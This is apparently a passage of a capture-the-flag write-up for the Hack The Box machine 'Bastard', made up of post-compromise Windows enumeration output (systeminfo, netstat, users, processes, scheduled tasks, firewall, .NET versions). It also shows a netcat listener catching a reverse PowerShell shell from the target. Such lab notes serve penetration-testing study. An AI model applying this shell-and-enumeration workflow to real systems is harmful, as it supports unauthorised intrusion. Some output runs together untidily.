System/Kernel
ps c:\inetpub\drupal-7.54> systeminfo
host name: BASTARD
os name: Microsoft Windows Server 2008 R2 Datacenter
os version: 6.1.7600 N/A Build 7600
os manufacturer: Microsoft Corporation
os configuration: Standalone Server
os build type: Multiprocessor Free
registered owner: Windows User
registered organization:
product id: 55041-402-3582622-84461
original install date: 18/3/2017, 7:04:46 ??
system boot time: 14/1/2023, 8:45:50 ??
system manufacturer: VMware, Inc.
system model: VMware Virtual Platform
system type: x64-based PC
processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
bios version: Phoenix Technologies LTD 6.00, 12/12/2018
windows directory: C:\Windows
system directory: C:\Windows\system32
boot device: \Device\HarddiskVolume1
system locale: el;Greek
input locale: en-us;English (United States)
time zone: (UTC+02:00) Athens, Bucharest, Istanbul
total physical memory: 2.047 MB
available physical memory: 1.582 MB
virtual memory: Max Size: 4.095 MB
virtual memory: Available: 3.596 MB
virtual memory: In Use: 499 MB
page file location(s): C:\pagefile.sys
domain: HTB
logon server: N/A
hotfix(s): N/A
network card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
connection name: Local Area Connection
dhcp enabled: No
IP address(es)
[01]: 10.10.10.9Microsoft Windows Server 2008 R2 Datacenter
6.1.7600 N/A Build 7600
x64-based PC
2 Processor(s)
Networks
PS C:\inetpub\drupal-7.54> netstat -ano -p tcp
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 680
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1072
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 372
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 764
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 808
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 480
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 496
TCP 10.10.10.9:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.9:49172 10.10.14.6:9999 ESTABLISHED 26760.0.0.0:81
0.0.0.0:445
0.0.0.0:3306
Users & Groups
ps c:\inetpub\drupal-7.54> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator dimitris Guest
The command completed with one or more errors.dimitris
Processes
┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.9] 49177
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\drupal-7.54> ps
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
32 5 948 2552 26 0,00 1704 conhost
556 11 2096 4204 48 328 csrss
72 9 10144 7876 51 388 csrss
201 16 4244 11204 56 1860 dllhost
0 0 0 24 0 0 Idle
165 25 9800 17448 88 756 LogonUI
574 20 3980 10160 44 496 lsass
138 7 2148 3608 18 504 lsm
147 18 3412 7728 60 2016 msdtc
522 15 51740 36584 112 1072 mysqld
112 19 21664 27336 126 2532 php-cgi
218 22 51988 49916 545 2,04 2236 powershell
204 13 3820 7396 34 480 services
30 2 424 1032 5 232 smss
263 19 6044 10764 80 308 spoolsv
169 9 5624 9716 45 2744 sppsvc
290 32 9164 11780 53 272 svchost
349 14 3972 9208 46 604 svchost
212 16 3208 7380 37 680 svchost
285 16 8588 10980 48 764 svchost
863 38 16200 28460 117 808 svchost
562 25 6812 13128 65 864 svchost
90 8 1588 4868 30 904 svchost
409 26 10504 14512 96 944 svchost
95 10 4024 8456 40 1044 svchost
46 4 928 2592 13 1176 svchost
151 14 7184 10892 47 1340 svchost
75 7 1376 3728 43 1584 svchost
435 0 112 304 3 4 System
97 11 4596 10368 63 1228 VGAuthService
279 23 9668 18544 87 1312 vmtoolsd
169 38 6108 12464 62 1744 w3wp
78 10 1456 4152 48 372 wininit
74 6 1440 4120 25 436 winlogon
222 15 6964 12540 52 1616 WmiPrvSE Tasks
ps c:\inetpub\drupal-7.54> schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v /i "access level"
folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
AD RMS Rights Policy Template Management Disabled
AD RMS Rights Policy Template Management N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Proxy N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
consolidator 15/1/2023 5:00:00 ?? Could not start
kernelceiptask 19/1/2023 3:30:00 ?? Ready
usbceip 16/1/2023 1:30:00 ?? Ready
TaskName Next Run Time Status
======================================== ====================== ===============
serverceipassistant 14/1/2023 11:48:57 ?? Could not start
TaskName Next Run Time Status
======================================== ====================== ===============
scheduleddefrag 18/1/2023 2:43:03 ?? Ready
TaskName Next Run Time Status
======================================== ====================== ===============
CorruptionDetector N/A Ready
DecompressionFailureDetector N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
LPRemove N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SystemSoundsService Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
GatherNetworkInfo N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
analyzesystem 24/1/2023 11:54:15 ?? Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ractask 14/1/2023 11:13:17 ?? Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ServerManager N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
IpAddressConflict1 N/A Ready
IpAddressConflict2 N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
MsCtfMonitor N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
synchronizetime 15/1/2023 1:00:00 ?? Ready
TaskName Next Run Time Status
======================================== ====================== ===============
QueueReporting N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
BfeOnServiceStartTypeChange N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Calibration Loader Disabled Firewall & AV
PS C:\inetpub\drupal-7.54> netsh firewall show config
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Domain profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Log configuration:
-------------------------------------------------------------------
File location = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .Installed .NET Frameworks
ps c:\inetpub\drupal-7.54> cmd /c reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v3.5